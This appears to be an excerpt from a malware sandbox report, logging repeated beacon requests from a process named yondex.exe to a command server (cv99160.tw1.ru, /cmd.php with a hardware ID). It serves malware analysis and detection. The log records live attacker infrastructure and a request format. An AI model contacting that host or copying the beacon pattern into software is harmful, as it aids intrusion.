                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              95192.168.2.44983892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:42 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:42 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1b082adda46542133cd365ccb5d29aba; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:42 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              96192.168.2.44983992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:43 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:43 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5da3d54346931780281a920e6b9cc820; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              97192.168.2.44984092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:44 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:45 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1b409a62f0514f41f554dc54e764d330; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              98192.168.2.44984192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:45 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:46 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=86fa6ee6c7293cfce5539071dc9c0689; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              99192.168.2.44984292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:46 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:47 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=a73701951f31623ce2beac67fb15fd60; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              100192.168.2.44984492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:48 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:48 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=aace48851006561d6328d57d0a5c0a47; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              101192.168.2.44984592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:49 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:49 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=3ad9d1877934d6bac33ef57e70d1551e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:49 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              102192.168.2.44984692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:51 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:52 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4d873cfc3f817515a4baece4ae74166b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              103192.168.2.44984792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:52 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:53 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=243d6afa948662cc68cf567fbbb026bc; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:53 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              104192.168.2.44984892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:56 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:56 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e3d3e6542c0ab9081672c9eae0198e41; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              105192.168.2.44984992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:57 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:57 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=39f21fb076571cf0a3cc2a0ce3b230f8; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:57 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              106192.168.2.44985092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:00 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:00 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=aec18e3f60e505b810e0dc3fdc9a435e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              107192.168.2.44985192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:01 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:02 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=56ad6948c0f0de49f19421293d276ed9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:02 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              108192.168.2.44985292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:03 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:03 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e243a82f7d1fe4cdb0aaddadba0106bb; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              109192.168.2.44985392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:04 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:04 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=40e2762714a7c021d8ff77fb46ea606c; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:04 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              110192.168.2.44985492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:07 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:08 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1c9f2b82e667986962b3cd7564aa0ff4; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              111192.168.2.44985592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:08 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:09 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=3bead8d61655891095023b04bcdd1625; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              112192.168.2.44985692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:09 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:10 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cb9ea5e2eccba66033dc098ddb50257a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:10 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              113192.168.2.44985792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:11 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:11 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6774ebaa5911cfd3f230cd7f2a6bfd53; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              114192.168.2.44985892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:12 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:12 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4d067782ceea1c1b531283c80f1fa242; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:12 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              115192.168.2.44985992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:15 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:15 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=579aa3f864adfa2e305cd11b65eb6402; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              116192.168.2.44986092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:16 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:16 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4028b942615069fd4b9aabd677bc0e81; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:16 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              117192.168.2.44986192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:17 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:17 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=78364f0c15bd5c585af0cdcddce922b7; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              118192.168.2.44986292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:18 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:18 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=07be0d2ace01a51e7e8c8c64085cb53b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:18 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              119192.168.2.44986392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:20 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:21 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=148962df435ecd7d4e806d65a0caca77; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              120192.168.2.44986492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:21 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:22 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=63f0ab212bca379ec4e7ddc50177ba1f; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:22 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              121192.168.2.44986592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:24 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:24 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=119687fb8ed39799f405e4cb4b6adb89; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              122192.168.2.44986692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:25 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:25 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:25 GMT
